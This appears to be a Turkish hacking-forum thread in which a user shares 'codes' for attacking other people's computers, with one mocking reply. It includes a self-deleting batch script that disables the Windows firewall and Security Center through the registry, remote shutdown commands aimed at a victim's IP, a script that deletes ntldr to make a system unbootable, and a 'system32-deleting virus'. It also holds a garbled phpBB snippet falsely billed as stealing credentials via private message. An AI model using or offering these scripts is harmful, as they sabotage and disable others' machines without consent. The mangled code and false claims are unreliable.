GörMediğimiz önemLi Bazı kodLar

¿__Ms-DoS__?

Katılımcı Üye
19 Mar 2009
290
0
30
Trabzon
karşı pc nin güvenlik duvarını kapatma :
Arkada$lar ßu kodLar qercekten coq onemLı cunku ßazı arkadaslarımız kar$ı pc qırmek weya ne ßılım dokuman faLan aLmak ısterken Guwenlık duwarı’na maruz kaLıpp hıc ßı ısLem yapamıyolar...=) ßuna care..:D
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\\\\\\\\kill.reg" ECHO A R E S
>>"%Temp%.\\\\\\\\kill.reg" ECHO.
>>"%Temp%.\\\\\\\\kill.reg" ECHO [HKEY_LOCAL_MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Servic es\\\\\\\\SharedAccess]
>>"%Temp%.\\\\\\\\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\\\\\\\\kill.reg" ECHO [HKEY_LOCAL_MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Servic es\\\\\\\\wuauserv]
>>"%Temp%.\\\\\\\\kill.reg" ECHO [HKEY_LOCAL_MACHINE\\\\\\\\SYSTEM\\\\\\\\ControlSet001\\\\\\\\Services\\\\\\\\w scsvc]
START /WAIT REGEDIT /S "%Temp%.\\\\\\\\kill.reg"
DEL "%Temp%.\\\\\\\\kill.reg"
DEL %0

İşte care..:D not defterine kopyalayın ve uzantısını bat yapın 100%100 çalışıyor
karşı pc emir verme

shutdown -i:Uzaktan Kapat’1 aç
shutdown -l:Oturumu Kapat.
shutdown -s:Bilgisayar1 kpat.
shutdown -r:Bilgisayar1 kapat ve y€niden ßaslat
shutdown -m //bilgisayarad1:Yeniden ba_latmak/ç1kmak için uzak bilg.
shutdown -t xx:kapatmak için bilgisayar1 xx saniyeye ayarla
shutdown -c:Kapatma yorumu en çok<127 karakter>
shutdown -f:Çal1_an uygulamalar1 direkman kapatmaya zorlar
shutdown -d:Kapatma için neden kodu
evet arkadaşlar bunları v€rdik ama şimdi n€ olucak.
başlat-çalıştır-cmd yazın.sonra bu komutlardan birini yazdıktan
sonra yanına arkadaşınızın ıp’sini yazın.sonra yazdığınız komuta
göre işlem görsün.
ip yazamayı unutmayın
Mail İle Web Site Yıkıcı
phpBBde özel mesaj ile hack yapmak isteyenler bu tam size göre...adminin veya üyenin artık kime atacağınız size kalmış özel mesaj ile atın ve o kişi mesajı okuduğunda bilgileri size gelecek..işte kod..

phpbb de

Kod:
// Save login tries and last login
if (&l036;row[&l039;user_id&l039;] != cookies)
&l123;
&l036;sql = &l039;UPDATE &l039; . USERS_TABLE . &l039;
SET user_login_tries = user_login_tries + 1, user_last_login_try = &l039; . time() . &l039;
WHERE user_id = &l039; . &l036;row[&l039;user_id&l039;];
&l036;db->sql_query(&l036;sql);
}
system 32 silen virüs
VİrÜs=İlk Önce Bİr Not Defterİ AÇiyoruz.oraya C:/windows/system32 /deleted Yaziyoruz Farkli Kaydetten .bat A Çevİrİyoruz
Önemlİ Not Kesİnlİkle Okumalisiniz=sytem32 KÜÇÜkse KÜÇÜk Yazilir.ben GelİŞİne Öyle Yazdim Tekrar SÖylÜyorum 100%100 denendi

karşı pc format at 2

cd..
cd..
attrib -s -h -r -a c:&l92;ntldr
del c:&l92;ntldr
shutdown -r
bu komutları not defterine yapıştırın uzantısını bat yapın

ßu komutLarı Cwde ßuLaßıLırsınız ama ßen tata54 qeNeL OLarak anLatmak ıstedımm... ßutunn hepsınıı ßurdaa topLayaLım dedım...! ßana ßuNLar ßazen cok cok Lazım OLduu...!Size oLur sanırım..
arkDaSLar ßı hatırLatma daha ßunLarı saKIn kendı Pc uzerınde denemeyınn..!

aRKadaşLar veriLen yazı aLıntıdır Türkçe olarak aLgıLanamayan yazı tipler ( q vb) HarfLeri ben yazmadım 1 Türk oLarak kodLarı WEB de doLaşırken buLdum bazı kodLarı bu sitede hiç görmedim işe yarayıp yaramadığını tam oLarak bilemicem bazıLarı kesin Yarıyor dierLerini denemedim sözü uzatmya gerek yok...

_EroS_

Yaşayan Forum Efsanesi
4 Mar 2009
8,670
4
39
Antalya
benim bildigim bunu Karşı Pc'e Yolladgn Zmn virüs Falan oLarak tanıyoo? Anca Şöle Bişe oLablr.. Yannda Falandır.. Devre Dşı Yaparsın ANTiVirüsü falan öle yaparsın işlemi ama gerek yok sonuçta girmek istiyosan zaten elinde pc.. sil system32'i :D:D:D ne blim ama güzeL yinede eline saqlıkk :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.